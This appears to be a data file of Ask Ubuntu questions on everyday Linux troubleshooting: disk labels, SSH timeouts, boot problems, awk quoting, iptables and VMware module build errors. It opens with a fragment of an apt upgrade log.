: i386 ( 1.5.3-0ubuntu8.2 , 1.5.3-0ubuntu8.3 ) , cups : amd64 ( 1.5.3-0ubuntu8.2 , 1.5.3-0ubuntu8.3 ) , cups-bsd : amd64 ( 1.5.3-0ubuntu8.2 , 1.5.3-0ubuntu8.3 ) , cherrytree : amd64 ( 0.33.1-1~ppa1~precise1 , 0.33.4-1~ppa1~precise1 ) , linux-libc-dev : amd64 ( 3.2.0-61.93 , 3.2.0-63.95 ) , libcupsmime1 : amd64 ( 1.5.3-0ubuntu8.2 , 1.5.3-0ubuntu8.3 ) , linux-generic-lts-raring : amd64 ( 3.8.0.39.39 , 3.8.0.41.41 ) end-date : 2014-06-01 10:39:31 start-date : 2014-06-01 10:58:07 commandline : apt-get dist-upgrade install : linux-headers-3.8.0-41 : amd64 ( 3.8.0-41.60~precise1 , automatic ) , linux-headers-3.8.0-41-generic : amd64 ( 3.8.0-41.60~precise1 , automatic ) , linux-image-3.8.0-41-generic : amd64 ( 3.8.0-41.60~precise1 ) upgrade : linux-image-generic-lts-raring : amd64 ( 3.8.0.39.39 , 3.8.0.41.41 ) , linux-headers-generic-lts-raring : amd64 ( 3.8.0.39.39 , 3.8.0.41.41 ) end-date : 2014-06-01 10:59:17
475225	i do n't understand why one disk is missing a label in xfce	i 'm running xubuntu 14.04 and i have an issue with the labels of my ext formatted disks on my graphical desktop : disk one is shown as foo . when i right click the disk and choose `` properties '' , this also shows foo in the name field . disk two is shown as 4,0 tb volume . when i right click the disk and choose `` properties '' , this shows bar , which is the name i want this disk to have . why is the name/label for one disk showing but not the other ? as far as i can tell , they are identical , as they were formatted at the same time and with the same filesystem ( ext3 or ext4 , i ca n't remember ) . edit : both of the disks are mounted at /media/user/volumename and bar is obviously called bar there as well , but xfce does not seem to recognize that name when displaying the same disk on the desktop . why is that ? edit2 : turns out that the partition is missing a label . by launching sudo gparted and examining the two disks , it clearly shows that the `` label '' column exists for the foo partition , but not for the bar partition . however , i ca n't unmount it , i get this : $ sudo umount /media/user/bar [ sudo ] password : umount : /media/user/bar : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) but nothing seems to be using it : $ fuser -mv /dev/sdd2 user pid access command /dev/sdd2 : root kernel mount /media/user/bar root kernel knfsd /media/user/bar anyway , i guess the answer here is that i need to apply a label , somehow , to the partition for it to show .
475229	ssh connection timed out in ubuntu desktop 14.04	i 'm having a problem with ssh in ubuntu desktop 14.04 . when i try ssh on local ( 192.168.1.23 ) i can access locally but when i try ssh on the external ip i 'm getting connection timed out . when i try to ping my external ip i 'm getting response i unable to connect throught ssh even if i port forwarded port 22 and added rule in ufw firewall . this was working in ubuntu server 14.04 but now i have a problem on desktop version . can somebody help me to solve this ? thanks in advance .
475230	problem while creating new user in 64 bit 14.04	i tried to create new user ubuntu 64 bit 14.04 i could log in using any console but when i try to log in using graphical mode , in new user i dont see the left menu and all that . it only shows desktop wall paper . i tired creating user both in command line mode and graphics mode too .
475232	unable to change desktop background using gsettings in unity	i am using ubuntu 14 unity . i am unable to change my wallpaper from the terminal . instead of the wallpaper the lock screen pic is changed . i typed this in the terminal by referring this link gsettings set org.gnome.desktop.background picture-uri 'file : ///home/prasad/pictures/wallpapers/cry.jpg'
475233	vpn do not mask the original ip in gmails	i 'm using ipvanish in singapore . i connected to a uk server , and indeed i 've got a uk ip . then i signed for a brand new gmail address and tried to send out gmails to a friend in singapore . however my friend was able to see my original singapore 's ip address on the gmail header . so , it seems ipvansh is not able to mask real ip in gmails . is there any way to do so ? thanks a lot .
475234	how to report unofficial package installed via software center ?	i 've installed a game called slingshot portal ( package name : portal-slingshot ) using ubuntu software center . the game fails to start with the following error : failed to execute command `` java -jar /opt/portal-slingshot/portal_slingshot_1.2.0.jar '' . failed to execute child process `` java '' ( no such file or directory ) obviously , i do n't have java installed , and the package did n't have java as a dependency . how do you report such cases ? i tried to run ubuntu-bug portal-slingshot but it exits with this message : this is not an official ubuntu package . please remove any third party package and try again . please note that i 'm not asking for instructions on how to install java , i 'm trying to report a broken third-party package that is available for download via the official ubuntu software center and therefore should have proper dependencies .
475237	error found in 1 file ?	i recently downloaded lubuntu 14.04 64bit standard pc disc image iso version . i tried to burn this image using xfburn to cd and dvd , but when i check the disc for defects in the lubuntu boot main screen , it always result : error found in 1 file . thanks in advance ,
475240	ati graphic card : trying to clone monitors	i 've two monitors connected to an ati graphic card ( ati hd 5450 ) , which has three ports , altough i 'm only using two of them : a 17 '' monitor connected to the analogic port , and a 32 '' tv to the hdmi port . in my system i 've , additionally , an extra integrated intel graphic card ( the original one ; the ati card was installed thereafter ) . when i boot ubuntu , i see , on my monitor , only the wallpaper , and on the tv , the complete graphic interface ( gnome-shell ) . that 's mean , the default screen is the tv , and the monitor is only an extension . what i want is to have both , the tv and the monitor , cloned . i can change that configuration using the `` screen '' configuration menu , but after rebooting , that changes are ignored ( again , i see the extended screen ) . how can i achieve it ?
475241	after boot repair laptop boots straight to windows 8 without grub - no solution for a week now	this is a repost because my original post was marked as having a solution/duplicate somewhere else and i read those solutions before and tried them countless times with no success . i followed the advice in my original post and i would like to say thank you for your help but the problem still exists . i am using a toshiba satellite l850-1l1 laptop with the following specs · processor intel ( r ) core ( tm ) i7-3630qm cpu @ 2.40 ghz · 8 gb ram · 64 bit operating system , x64-based processor · 1 tb hdd ( no ssd ) , gpt partitioning scheme ( guid partition table ) · system bios version 6.7 / ec version 6.00 ( no idea if this bit of info will help or not ) note : in the my computer window i can see only 3 partitions ( c , e and g ) . there are 3 other partitions - oem partition , uefi partition , oem/recovery partiton . after installing ubuntu u can add a swap area partition and the ubuntu system partition . is the max number of 4 primary partitions the problem with my system or am i in the clear on this one ? with try ubuntu i was able to boot the live version without problems , then started installing ubuntu and when i got to the system installation window there was no option that said “install alongside windows 8” . so i picked “something else” , made a 5.77 gb partition ( read somewhere that it is supposed to be 10 % the size of the main system partition ) for swap area and 51.22 gb for booting the main system ( / ) . after installation grub menu opened and i could open ubuntu without problems but with windows , it gave me an error and did not want to boot it . i ran boot repair and it closed with an error and gave me a pop out message saying i should turn off secure boot . after that , there was no grub and it boots straight to windows . here is the first boot repair link : paste.ubuntu.com/7517709 i then formatted the partitions twice more and did the whole thing again with secure boot disabled this time . again no grub menu and boots straight to windows 8 ( yes windows 8 on my laptop works with secure boot disabled ) , so i entered the live version and ran boot repair again . this time it did not tell me that i should disable secure boot , but it did not solve the problem either . same problem , no grub and boots straight to windows . here is the boot repair link : paste.ubuntu.com/7536732 here is the boot repair link : paste.ubuntu.com/7565465 a couple of more points : · i can not change the os boot manager in bios , i.e . i can not choose boot priority between windows 8 & ubuntu . simply because that option does not exist · boot manager in bios allows me to choose between csm and uefi only plus hibernate and fast startup are disabled . no matter what i do grub never comes up and boot repair ends with an error . please i need advice urgently . it has been a week now
475243	why does using double quotes to enclose awk 's action statements produce different results than when using single quotes to enclose them ?	if i use single quotes to enclose awk 's action statement , it works as expected : $ dpkg -l | grep `` linux\- [ a-z ] *\- '' | awk { 'print $ 2 ' } linux-headers-3.13.0-27 linux-headers-3.13.0-27-generic linux-headers-3.14.4-031404 linux-headers-3.14.4-031404-generic linux-headers-generic linux-image-3.13.0-27-generic linux-image-3.14.4-031404-generic linux-image-extra-3.13.0-27-generic linux-image-generic linux-libc-dev : i386 linux-sound-base but if i use double quotes to enclose them , it prints the whole line instead of the particular column/field : $ dpkg -l | grep `` linux\- [ a-z ] *\- '' | awk { `` print $ 2 '' } ii linux-headers-3.13.0-27 3.13.0-27.50 all header files related to linux kernel version 3.13.0 ii linux-headers-3.13.0-27-generic 3.13.0-27.50 i386 linux kernel headers for version 3.13.0 on 32 bit x86 smp ii linux-headers-3.14.4-031404 3.14.4-031404.201405130853 all header files related to linux kernel version 3.14.4 ii linux-headers-3.14.4-031404-generic 3.14.4-031404.201405130853 i386 linux kernel headers for version 3.14.4 on 32 bit x86 smp ii linux-headers-generic 3.13.0.27.33 i386 generic linux kernel headers ii linux-image-3.13.0-27-generic 3.13.0-27.50 i386 linux kernel image for version 3.13.0 on 32 bit x86 smp ii linux-image-3.14.4-031404-generic 3.14.4-031404.201405130853 i386 linux kernel image for version 3.14.4 on 32 bit x86 smp ii linux-image-extra-3.13.0-27-generic 3.13.0-27.50 i386 linux kernel extra modules for version 3.13.0 on 32 bit x86 smp ii linux-image-generic 3.13.0.27.33 i386 generic linux kernel image ii linux-libc-dev : i386 3.13.0-27.50 i386 linux kernel headers for development ii linux-sound-base 1.0.25+dfsg-0ubuntu4 all base package for alsa and oss sound systems why is it so ? why does using double quotes to enclose awk 's action statements produce different results than when using single quotes to enclose them ? can i do something so that enclosing using double quotes works like enclosing using single quotes ?
475244	why is n't my external hdd and sd card found anywhere in ubuntu 12.04 ( though lsusb detects it ) ?	i used ubuntu 10.04 before . the external 1tb memory ( toshiba canvio 3.0 1tb portable usb 3.0 external hdd ) was not detected there . so i upgraded to ubuntu 12.04 just this morning ( as of the date of this post ) so as to solve my issue . but the external 1tb memory is still not available . i ca n't find it anywhere . also , i have an sd card that will not show up ( it showed up in 10.04 ) . can anyone help me with these problems ? i am sure they are somehow related . note that lsusb detects my device as shown below ( this happened in 10.04 and happens in my 12.04 also now ) : - bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 12d1:1037 huawei technologies co. , ltd. ideos bus 001 device 005 : id 1415:2000 nam tai e & e products ltd. or omnivision technologies , inc. sony playstation eye bus 001 device 006 : id 0480:0200 toshiba america info . systems , inc . bus 003 device 002 : id 046d : c31c logitech , inc . keyboard k120 for business bus 004 device 002 : id 046d : c064 logitech , inc . bus 008 device 002 : id 058f:6363 alcor micro corp . but neither nautilus or even disks utility for that matter will detect my hdd or sd card . also note that i once messed up a little bit trying to format this hdd . now you might say reformat it . but again disks utility wo n't detect it . any ideas ?
475245	how to make terminator open new tab with my default layout	in terminator , i have a 3-split layout that i have set as the default layout as explained here . but when i open a new tab , it still opens with just a single terminal , not the 3-split layout i want . how to make terminator open all new tabs with my default layout ? note : the answer to this question does not work for layouts .
475246	error message before boot screen	i 'm getting the following error message just before ubuntu 's boot screen . libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/nvidia-installer-disable-nouveau.conf line 9 : ignoring bad line starting with 'alias' libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/nvidia-installer-disable-nouveau.conf line 10 : ignoring bad line starting with 'nvidia_current_updates' but , i do n't have any problem after getting in to desktop . /etc/modprobe.d/nvidia-installer-disable-nouveau.conf # generated by nvidia-installer blacklist nouveau options nouveau modeset=0
475250	ubuntu server installation - partition ca n't finalize	i need help on ubuntu server installation . just ca n't pass the partition section . i have 3 hdd 2 with raid 0 from bios and 1 for the operating system . in my previous kubuntu setup , home directory was the raid and operating system was on seperate hdd . i would like to do the same with ubuntu server and would like to keep my home directory hence raid not changes or formated . on partition section , i have removed the partition on operating system hdd and partition again for the new installation and assigned the raid as home director with ext4 . when i try to finalize , it is giving an error and throwing me a message saying failed to remove conflicting files . i am assuming that this is due to home directory . how can i overcome this problem and install server and assign raid as my home directory which was my previous home from kubuntu setup ? i appreciate any suggestion . thanks in advance .
475251	electricity went out while installing software	just installed 14.04 so i gave the software centre about 5 programs to install and i left it and went away . then the electricity went out . what is the correct thing to do now ? most importantly i want to clean up ( remove ) the `` parts of softwares '' that were installed . ... is there something like a restore point to go back to ?
475252	disable text file previews/thumbnails in nautilus	nautilus in 14.04 generates `` thumbnails '' of all text files in that it shows them all as the same , blank text icon . if i turn off thumbnails altogether , then it displays correct icons , but i need thumbnails of image files . so i tried enabling thumbnails , and then in dconf disabling them specifically for 'text/css ' , and so on . this does not work . can this be achieved without disabling all thumbnails ? i should note i searched this site and there 's a few posts here addressing this issue , but those posts are without answers , or referred to other posts - that are also without answers . a bit of a vicious circle . i 'd appreciate any suggestions.thanks .
475254	desktop not appearing after a change in xorg.conf	i tried to install nvidia-current on my ubuntu 12.04 because i did n't have the driver for it but it seemed that had no effect so i removed . after that , i do n't remember anymore , i tried to configure the /etc/x11/xorg.conf in the screen section because when i removed the nvidia driver , my default screen mode 1920x1080 went to a low resolution but the problem is that i made this command with ctrl+alt+f1 and used vim but i have no success so i did it by the terminal of desktop . after the changes i made in the screen section , i.e i put the string '1920x1080 ' in the section , my computer just boot , the ubuntu logo appears , but after that nothing appears more . no logon screen , nothing . i can see the screen is on but nothing appears . i am also trying to solve this with my ubuntu live cd but i ca n't also log on the desktop . i think my nvidia driver is currently be using but in mode `` fallback '' ( i saw this in the system information , before i rebooted ) . so , what can i do to restore my screen to normal mode '1920x1080 ' ? ( remember that i have no access to my desktop . also i tried to remove a file with .xml format in the .config/ because i saw that if i removed it the problem would gone , but did n't solve to me ) . thanks in advance
475255	why can an application installed using wine not access ntfs partitions ?	ubuntu was installed alongside windows 7 on my system . after some days , i deleted and formatted the windows partition and did n't format the other ntfs partitions . before that , i installed wine on my ubuntu . i used it to install some software like picasa . when i tried to open some images on a ntfs partition using picasa , i was unable to view or access these partitions . i will show my partition details - as you see , i have 4 ntfs partitions in total . when i opened picasa and searched for the partitions in which the images are saved , i was unable to find some partitions ( sda5 , sda6 and sda7 ) . this is the window that was opened by picasa when i tried to search image files . how can i access the partitions in which the images are stored from picasa ?
475257	versions of kdenlive in official repositories are deprecated	on kdenlive 's official download page for ubuntu they said this exact statement . firstly what exactly does that mean ? and why and how is that ? ?
475258	images and links not visible on a particular website	the images are not visible at all on this particular website http : //www.lenskart.com/sunglasses/frame-style/full-rim.html i have tried it with opera and epiphany as well , other than firefox.but the problem is the same with all the browsers as well.i tried removing the add-ons and even running the other freshly installed browsers , yet nothing is visible in this particular site.i have tried googling for answers and got nowhere.i am new to ubuntu and i had no such issue with this site when i was using windows xp , so any help will be appreciated . regards andy
475259	windows 8 dvd not booting ?	i have a windows 8 disk and it was able to boot from that disk when there was windows 7 on my system . after the formatting of c drive yesterday , i tried to install windows 8 by booting from the disk . unfortunately , this time no booting happened from the disk . so i pressed f2 during the system start up and checked boot device priority , optical drive has the first priority there . so why windows 8 did n't boot from the disk ? i need to install windows 8 too in my system without doing any damage to ubuntu 14.04 . how can i do it ?
475262	ubuntu 14.04 will not recognise my epson wp4545 printer .	ubuntu 14.04 does not recognise my epson wp4545 wireless printer . when add printer , it finds it , and the proper driver , but when i try to download the driver it freezes . i have un-installed ubuntu and re-installed , with the same result . i have been at this for weeks and getting no where .
475265	force pc to calculate equation to infinite decimal places ?	i need a software or a command line to display the irrational number 22/7 indefinitely . when i use calc , i 'm shown a finite number of decimal places : ~ $ calc 22/7 ~3.14285714285714285714 how can i force my pc to calculate forever ?
475267	xubuntu + steam ! = counterstrike : source	i recently bought this computer from a used equipment auction . i installed xubuntu [ ubuntu 14.04 lts ( 32 bit ) ] and decided to try if i can play counterstrike : source using steam here . after installation , i got this message : '' could not find required opengl entry point 'glgeterror ' ! either your video card is unsupported , or your opengl driver needs to be updated . '' i tried a few remedies advised on-line , like sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get dist-upgrade and sudo apt-get install xorg-x11-drv-catalyst-devel.i686 xorg-x11-drv-catalyst-libs.i686 but got no results .
475272	ubuntu mixed boot	i have a problem during boot my ubuntu starts with console interface , then switches to gui . in this video you can see how it happens : http : //youtu.be/-ps26ocwsgm thanks for the help in advance .
475274	can not clone git repository setup using filesystem permissions but can ssh	i 've setup a local git server on ubuntu 12.04 . the repos can be cloned locally on the server , but i can not clone the repo from another server . i can ssh to the server with the same config . ~/.ssh/config ( client ) host i-git hostname myhost user git identityfile % d/.ssh/i_git_id_rsa # loglevel debug3 running : ssh i-git works well . running : git clone i-git : /home/git/test.git seems to just hang . debug output ( uncomment loglevel in ~/.ssh/config ) : debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug3 : check_host_in_hostfile : filename *** < localuser > ***/.ssh/known_hosts debug2 : key_type_from_name : unknown key type 'ecdsa-sha2-nistp256 ' debug3 : key_read : missing keytype debug3 : check_host_in_hostfile : filename /etc/ssh/ssh_known_hosts debug3 : check_host_in_hostfile : filename *** < localuser > ***/.ssh/known_hosts debug3 : check_host_in_hostfile : filename /etc/ssh/ssh_known_hosts debug2 : no key of type 0 for host ***myhost*** debug3 : check_host_in_hostfile : filename < localuser > /.ssh/known_hosts2 debug3 : check_host_in_hostfile : filename /etc/ssh/ssh_known_hosts2 debug3 : check_host_in_hostfile : filename *** < localuser > ***/.ssh/known_hosts debug2 : key_type_from_name : unknown key type 'ecdsa-sha2-nistp256 ' debug3 : key_read : missing keytype debug3 : check_host_in_hostfile : filename /etc/ssh/ssh_known_hosts debug2 : no key of type 2 for host ***myhost***
475276	a little help with a specific script	having issues understanding the instructions on this post . i 'm not sure how to apply the script . i 'm on a c720 running chrubuntu . any help would be great .
475279	move all lowest-level subdirectories ( but not mid-level directories or files ) to a target directory	let 's say i have a source/ directory which has many subdirectories . some of these subdirectories have sub-subdirectories , and some of those sub-subdirectories have sub-sub-subdirectories , and so on . what i want to do is recursively find all lowest-level subdirectories ( subdirectories that do not have any further subdirectories ) of source/ and move them to a new target directory . for instance , let 's say the original source/ looks like this : /source/dir1 -- subdirectory without sub-subdirectory /source/dir2 -- subdirectory with sub-subdirectory /source/dir2/dir2.a -- sub-subdirectory without sub-sub-subdirectory /source/dir2/dir2.b -- sub-subdirectory without sub-sub-subdirectory then after the operation , the target directory should look like this : /target/dir1 /target/dir2.a /target/dir2.b is there a way to do this with a terminal command ?
475283	port forwarding udp did n't work	the tcp forwarding work . my commands : sudo iptables -f sudo iptables -a forward -j accept -p tcp -- dport 3072 -d 10.42.0.84 -m state -- state new sudo iptables -t nat -a prerouting -p tcp -- dport 3072 -j dnat -- to-destination 10.42.0.84:3072 i try it with udp instead of tcp , but it did n't work . what did i do wrong ?
475287	configuring mouse buttons to switch between apps ?	i just installed 14.04 , so i 'm using the default setup ( unity , i guess ) . i have these two extra mouse buttons on the side of my mouse . is there any way to map these so they can switch between open apps ? what would be perfect is if clicking on button 6 ( or whatever it is ) would cycle forward through apps , button 7 would go backwards , and holding one of the buttons would show the task list and let you click on the app you want . that 's really what i want .
475295	error in displaying youtube videos in opera	i am using xubuntu 14.04 and opera browser . when i open youtube videos in it is displayed strangely . this question does not answer this problem.this error occurs only in opera browser . how do i fix this .
475296	unity launcher and menu bar disappeared in 14.04	the menu bar and unity launcher have disappeared in ubuntu 14.04 . also can not access the terminal via ctrl + alt + t. i have tried every solution for this issue that i can find , from re-installing untiy and compiz to resetting unity and everything . i 've gone into the compiz manager and reactived unity . nothing has worked . when trying to reset unity , or do anything with it really , i get this message ( process:6332 ) : dconf-warning ** : failed to commit changes to dconf : could not connect : connection refused edit : installed 14.04 a day ago . the issue happened after a reboot . after installing virtual box
475303	audio output and input stopped working after the last update	i 'm using ubuntu 14.04 and everything was perfect until todays 's update . now my audio output ( speakers ) and input ( microphone ) stopped working . i guess it 's a driver issue , but i need help to debug this problem and to solve it . i have a dell inspiron 5421 notebook with an intel audio integrated sound card : $ lspci | grep audio 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) if i go to ubuntu settings > > sound > > output , it does n't show my intel card there anymore , it shows a dummy output instead : the same for the input tab , it doesn 's show my intel card there anymore : could you please help me ?
475304	how to scale all controls equally with high resolution display setting ?	i 've had some success using unity on a high resolution display ( mac retina ) by adjusting the 'scale for menu and title bars ' ratio ( see image below ) ; however , some of the icons ( including sliders and checkboxes , see image again ) are not scaling , while others ( including buttons and drop downs ) are . is there any way to increase the size of all controls equally ? thanks .
475307	iptables rules keep showing up	i just installed an ubuntu precise server , after a few weird communications issues i checked the iptables list and found : chain input ( policy drop ) target prot opt source destination accept all -- anywhere anywhere accept all -- anywhere anywhere state related , established accept tcp -- 10.0.0.0/24 anywhere tcp spts:1024:65535 dpt : ssh state new accept icmp -- anywhere anywhere state new accept icmp -- anywhere anywhere state new accept icmp -- anywhere anywhere state new accept icmp -- anywhere anywhere state new drop tcp -- anywhere anywhere tcp dpt:10520 state new drop udp -- anywhere anywhere udp spts:1:65535 dpt:31337 state new drop udp -- anywhere anywhere udp spts:1:65535 dpt:31338 state new drop udp -- anywhere anywhere udp spts:1:65535 dpt:54320 state new drop udp -- anywhere anywhere udp spts:1:65535 dpt:54321 state new drop tcp -- anywhere anywhere tcp dpt:12345 state new drop tcp -- anywhere anywhere tcp dpt:12346 state new drop tcp -- anywhere anywhere tcp dpt:20034 state new drop tcp -- anywhere anywhere tcp dpt:16600 state new drop tcp -- anywhere anywhere tcp dpt:16660 state new drop tcp -- anywhere anywhere tcp dpt:65000 state new drop udp -- anywhere anywhere udp dpt:34555 state new drop udp -- anywhere anywhere udp dpt:35555 state new drop udp -- anywhere anywhere udp spts : netbios-ns : netbios-dgm dpts : netbios-ns : netbios-dgm state new drop tcp -- anywhere anywhere tcp spts:1024:65535 dpt : netbios-ssn state new drop tcp -- anywhere anywhere tcp spts:1024:65535 dpt : microsoft-ds state new drop udp -- anywhere anywhere udp spt : microsoft-ds dpt : microsoft-ds state new drop udp -- anywhere anywhere udp spts:1024:65535 dpt : microsoft-ds state new drop tcp -- anywhere anywhere tcp spts:1024:65535 dpt : loc-srv state new drop tcp -- anywhere anywhere tcp spts:1024:65535 dpt:5000 state new drop tcp -- anywhere anywhere tcp spts:1024:65535 dpts:1025:1029 state new drop udp -- anywhere anywhere udp spts:1:65535 dpt : loc-srv state new accept tcp -- anywhere anywhere tcp spts:1024:65535 dpt:28082 state new drop all -- anywhere anywhere state new chain forward ( policy drop ) target prot opt source destination chain output ( policy drop ) target prot opt source destination accept all -- anywhere anywhere accept all -- anywhere anywhere state related , established accept tcp -- anywhere anywhere tcp spts : tcpmux:65535 dpts : tcpmux:65535 state new accept udp -- anywhere anywhere udp dpts:1:65535 state new accept icmp -- anywhere anywhere state new accept tcp -- anywhere anywhere tcp spts:1024:65535 dpt:28082 state new drop all -- anywhere anywhere state new i tried to wipe the rules , i disabled ufw , ive rewritten and saved iptables rules according to this guide , but every minute or so the old rules return ... . i checked crontab for scheduled tasks , there is nothing in there but still these rules appear every minute ... please help !
475308	lightspark does n't works in firefox 29.0 and chromium 34.0.1847.116 ( ubuntu 14.04 )	i need your help , i 'm using ubuntu 14.04 and i 've installed lightspark ( lightspark 0.7.2-3ubuntu1 ) as an alternative to adobe flash player . but lightspark does n't works both with firefox 29.0 and chromium 34.0.1847.116 . what and how do i do to make lighspark run with both browsers ? i 'm waiting your answer . thanks for the attention . best regards . vagner augusto .
475312	errors compiling vmnet for vmware player , 3.13.0-27-generic	update : this problem went away after rebooting in 3.13.0-29-generic . i am trying to install and run vmware player on ubuntu 14.04 , kernel 3.13.0-27-generic . i downloaded and executed the latest official bundle vmware-player-6.0.2-1744117.x86_64.bundle . but it 's not able to build the `` vmnet '' kernel module required to run . i have installed packages linux-headers-3.13.0-27 , linux-headers-3.13.0-27-generic , linux-image-3.13.0-27-generic , linux-image-extra-3.13.0-27-generic . i tried applying the patch described at the answer http : //askubuntu.com/a/444375/285902 . that might have improved things but did n't solve all the issues . each attempt creates a file /tmp/vmware-root/vmware-modconfig-*.log . one possible issue repeated in those files looks like : 2014-06-01t10:41:33.896-05:00| vthread-3| i120 : failed to find /lib/modules/3.13.0-27-generic/build/include/linux/version.h 2014-06-01t10:41:33.896-05:00| vthread-3| i120 : /lib/modules/3.13.0-27-generic/build/include/linux/version.h not found , looking for generated/uapi/linux/version.h instead . but that might not be serious , since /lib/modules/3.13.0-27-generic/build/include/generated/uapi/linux/version.h does exist . otherwise , the only thing that stands out is the last two lines : 2014-06-01t10:41:34.570-05:00| vthread-3| i120 : building module with command `` /usr/bin/make -j6 -c /tmp/modconfig-vzryea/vmnet-only auto-build header_dir=/lib/modules/3.13.0-27-generic/build/include cc=/usr/bin/gcc is_gcc_3=no '' 2014-06-01t10:41:36.174-05:00| vthread-3| w110 : failed to build vmnet . failed to execute the build command . a manual command sudo vmware-modconfig -- console -- install-all outputs this : stopping vmware services : vmware authentication daemon done vm communication interface socket family done virtual machine communication interface done virtual machine monitor done blocking file system done using 2.6.x kernel build system . make : entering directory `/tmp/modconfig-ozb2a1/vmmon-only' /usr/bin/make -c /lib/modules/3.13.0-27-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . \ modulebuilddir= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-27-generic' cc [ m ] /tmp/modconfig-ozb2a1/vmmon-only/linux/driver.o cc [ m ] /tmp/modconfig-ozb2a1/vmmon-only/linux/driverlog.o cc [ m ] /tmp/modconfig-ozb2a1/vmmon-only/linux/hostif.o cc [ m ] /tmp/modconfig-ozb2a1/vmmon-only/common/apic.o cc [ m ] /tmp/modconfig-ozb2a1/vmmon-only/common/comport.o cc [ m ] /tmp/modconfig-ozb2a1/vmmon-only/common/cpuid.o cc [ m ] /tmp/modconfig-ozb2a1/vmmon-only/common/hashfunc.o cc [ m ] /tmp/modconfig-ozb2a1/vmmon-only/common/memtrack.o cc [ m ] /tmp/modconfig-ozb2a1/vmmon-only/common/phystrack.o cc [ m ] /tmp/modconfig-ozb2a1/vmmon-only/common/task.o in file included from include/linux/rtc.h:28:0 , from include/linux/mc146818rtc.h:15 , from /tmp/modconfig-ozb2a1/vmmon-only/linux/hostif.c:76 : include/linux/device.h:601:6 : error : unknown type name ‘dv_match_t’ dv_match_t match , void *match_data ) ; ^ cc [ m ] /tmp/modconfig-ozb2a1/vmmon-only/common/vmx86.o cc [ m ] /tmp/modconfig-ozb2a1/vmmon-only/vmcore/moduleloop.o make [ 2 ] : *** [ /tmp/modconfig-ozb2a1/vmmon-only/linux/hostif.o ] error 1 make [ 2 ] : *** waiting for unfinished jobs ... . /tmp/modconfig-ozb2a1/vmmon-only/linux/driver.c:1342:1 : warning : always_inline function might not be inlinable [ -wattributes ] linuxdriversyncreadtscs ( uint64 *delta ) // out : tsc max - tsc min ^ make [ 1 ] : *** [ _module_/tmp/modconfig-ozb2a1/vmmon-only ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-27-generic' make : *** [ vmmon.ko ] error 2 make : leaving directory `/tmp/modconfig-ozb2a1/vmmon-only' using 2.6.x kernel build system . make : entering directory `/tmp/modconfig-ozb2a1/vmnet-only' /usr/bin/make -c /lib/modules/3.13.0-27-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . \ modulebuilddir= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-27-generic' cc [ m ] /tmp/modconfig-ozb2a1/vmnet-only/driver.o cc [ m ] /tmp/modconfig-ozb2a1/vmnet-only/hub.o cc [ m ] /tmp/modconfig-ozb2a1/vmnet-only/userif.o cc [ m ] /tmp/modconfig-ozb2a1/vmnet-only/netif.o cc [ m ] /tmp/modconfig-ozb2a1/vmnet-only/bridge.o cc [ m ] /tmp/modconfig-ozb2a1/vmnet-only/filter.o in file included from include/linux/dmaengine.h:24:0 , from include/linux/skbuff.h:31 , from include/linux/if_ether.h:23 , from /tmp/modconfig-ozb2a1/vmnet-only/filter.c:23 : include/linux/device.h:601:6 : error : unknown type name ‘dv_match_t’ dv_match_t match , void *match_data ) ; ^ in file included from include/linux/pm_qos.h:10:0 , from include/linux/netdevice.h:28 , from /tmp/modconfig-ozb2a1/vmnet-only/driver.c:32 : include/linux/device.h:601:6 : error : unknown type name ‘dv_match_t’ dv_match_t match , void *match_data ) ; ^ in file included from include/linux/pm_qos.h:10:0 , from include/linux/netdevice.h:28 , from /tmp/modconfig-ozb2a1/vmnet-only/hub.c:29 : include/linux/device.h:601:6 : error : unknown type name ‘dv_match_t’ dv_match_t match , void *match_data ) ; ^ in file included from include/linux/pm_qos.h:10:0 , from include/linux/netdevice.h:28 , from /tmp/modconfig-ozb2a1/vmnet-only/bridge.c:29 : include/linux/device.h:601:6 : error : unknown type name ‘dv_match_t’ dv_match_t match , void *match_data ) ; ^ in file included from include/linux/dmaengine.h:24:0 , from include/linux/skbuff.h:31 , from include/linux/if_ether.h:23 , from /tmp/modconfig-ozb2a1/vmnet-only/userif.c:27 : include/linux/device.h:601:6 : error : unknown type name ‘dv_match_t’ dv_match_t match , void *match_data ) ; ^ in file included from include/linux/pm_qos.h:10:0 , from include/linux/netdevice.h:28 , from /tmp/modconfig-ozb2a1/vmnet-only/netif.c:29 : include/linux/device.h:601:6 : error : unknown type name ‘dv_match_t’ dv_match_t match , void *match_data ) ; ^ /tmp/modconfig-ozb2a1/vmnet-only/filter.c:213:1 : error : conflicting types for ‘vnetfilterhookfn’ vnetfilterhookfn ( unsigned int hooknum , // in : ^ /tmp/modconfig-ozb2a1/vmnet-only/filter.c:64:18 : note : previous declaration of ‘vnetfilterhookfn’ was here static nf_hookfn vnetfilterhookfn ; ^ /tmp/modconfig-ozb2a1/vmnet-only/filter.c : in function ‘vnetfilterhookfn’ : /tmp/modconfig-ozb2a1/vmnet-only/filter.c:264:16 : error : ‘ops’ undeclared ( first use in this function ) transmit = ( ops- > hooknum == vmw_nf_inet_post_routing ) ; ^ /tmp/modconfig-ozb2a1/vmnet-only/filter.c:264:16 : note : each undeclared identifier is reported only once for each function it appears in 